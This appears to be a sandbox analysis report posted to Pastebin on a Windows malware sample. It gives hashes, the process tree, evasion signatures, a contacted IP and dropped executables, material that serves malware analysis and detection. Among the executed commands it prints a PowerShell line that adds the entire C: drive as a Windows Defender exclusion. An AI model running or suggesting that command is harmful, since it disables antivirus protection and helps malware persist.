Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: ""
- * MalScore: 10.0
- * File Name: "Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe"
- * File Size: 1354905
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "b0492dcfb8b319622a1e7a30ff534abb58a51d043e28a2025557935ef7714766"
- * MD5: "8ce88300cfa130c6c062cd9b108e7a4b"
- * SHA1: "06da6fd3a9a4ccd8a9f844a7879214a5158400ca"
- * SHA512: "7856b2c0268d1a883094e6387816124927ca947bb29870780a33afa63a9059f702084d821c9952380d61aa76a0135f990a2810eba944c7b5d03cf7aa1a83d5af"
- * CRC32: "6E750B68"
- * SSDEEP: "24576:bNA3R5drXTLPdLRkWRPCpNAlu55qpLPjia4F9lgeDbeibsRfGZojnTIaxYQ:G5PltbxCXMLubF/gUbsR0aL"
- * Process Execution:
- "Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe",
- "wscript.exe",
- "nvt.exe",
- "nvt.exe",
- "RegSvcs.exe",
- "powershell.exe",
- "ubFGsyGHf.exe",
- "yfCcmcKCH.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe"
- * Executed Commands:
- "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\mhh.vbs\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\mhh.vbs ",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\nvt.exe\" rau=hmw",
- "nvt.exe rau=hmw",
- "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\nvt.exe C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\WEMED",
- "powershell Add-MpPreference -ExclusionPath C:\\",
- "C:\\Users\\user\\AppData\\Roaming\\ubFGsyGHf.exe ",
- "C:\\Users\\user\\AppData\\Roaming\\yfCcmcKCH.exe ",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
- "Details":
- "IP": "185.61.138.111:80"
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "nvt.exe, PID 324"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details":
- "Window": "WSH-Timer"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00000007, length: 0x0014ac92"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00049db0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0004bda0, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0004dd90, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0004fd80, length: 0x00002000"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00050a00, length: 0x00000032"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00050a1a, length: 0x000f6deb"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x001479aa, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00147b74, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00147d46, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00147f43, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014814f, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00148340, length: 0x00000027"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014852a, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x001486f5, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x001488d2, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00148ae2, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00148cbc, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00148ed8, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x001490a5, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00149288, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00149486, length: 0x00000027"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00149657, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014984e, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00149a1c, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00149c34, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00149e05, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x00149fe3, length: 0x00000029"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014a1e9, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014a3f6, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014a5dd, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014a81b, length: 0x00000028"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014aa08, length: 0x00000027"
- "self_read": "process: Exes_8ce88300cfa130c6c062cd9b108e7a4b.exe, pid: 2328, offset: 0x0014abdc, length: 0x0000001b"
- "self_read": "process: wscript.exe, pid: 2732, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 2732, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2732, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 2732, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 2732, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2732, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2732, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 2732, offset: 0x00018640, length: 0x00000012"
- "self_read": "process: RegSvcs.exe, pid: 2396, offset: 0x00000000, length: 0x00008000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00000007, length: 0x0015e0fc"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00049db0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0004bda0, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0004dd90, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0004fd80, length: 0x00002000"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00050a00, length: 0x00000031"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00050a19, length: 0x0010816e"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00158d2b, length: 0x0000043f"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00159307, length: 0x0000042d"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00159922, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x00159b29, length: 0x000003db"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015a0b7, length: 0x000001f2"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015a47a, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015a667, length: 0x000007cc"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015afe8, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015b1e9, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015b3b4, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015b5be, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015b787, length: 0x00000027"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015b97c, length: 0x00000027"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015bb53, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015bd6e, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015bf60, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015c159, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015c322, length: 0x00000027"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015c516, length: 0x00000029"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015c73b, length: 0x00000029"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015c928, length: 0x00000027"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015caf5, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015ccc8, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015ce97, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015d074, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015d24b, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015d450, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015d68d, length: 0x00000029"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015d874, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015da6b, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015dc67, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015de63, length: 0x00000028"
- "self_read": "process: ubFGsyGHf.exe, pid: 2752, offset: 0x0015e044, length: 0x0000001b"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00000007, length: 0x0015e0fc"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00049db0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0004bda0, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0004dd90, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0004fd80, length: 0x00002000"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00050a00, length: 0x00000031"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00050a19, length: 0x00001782"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x000eb6b2, length: 0x0000002e"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x000fa8eb, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x000fa965, length: 0x0000002a"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00158764, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00158983, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00158b5f, length: 0x000001f4"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00158f3d, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00159142, length: 0x000001ed"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00159509, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015970d, length: 0x00000444"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00159cf9, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x00159edc, length: 0x00000203"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015a282, length: 0x0000040d"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015a855, length: 0x000001fb"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015abf8, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015ae0b, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015afe8, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015b1e9, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015b3b4, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015b5be, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015b787, length: 0x00000027"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015b97c, length: 0x00000027"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015bb53, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015bd6e, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015bf60, length: 0x00000050"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015c181, length: 0x00000027"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015c349, length: 0x00000029"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015c53f, length: 0x00000029"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015c764, length: 0x00000027"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015c94f, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015cb1d, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015ccf0, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015cebf, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015d09c, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015d273, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015d478, length: 0x00000029"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015d6b6, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015d89c, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015da93, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015dc8f, length: 0x00000028"
- "self_read": "process: yfCcmcKCH.exe, pid: 2436, offset: 0x0015de8b, length: 0x0000001b"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Roaming\\ubFGsyGHf.exe"
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\79617677\\nvt.exe"
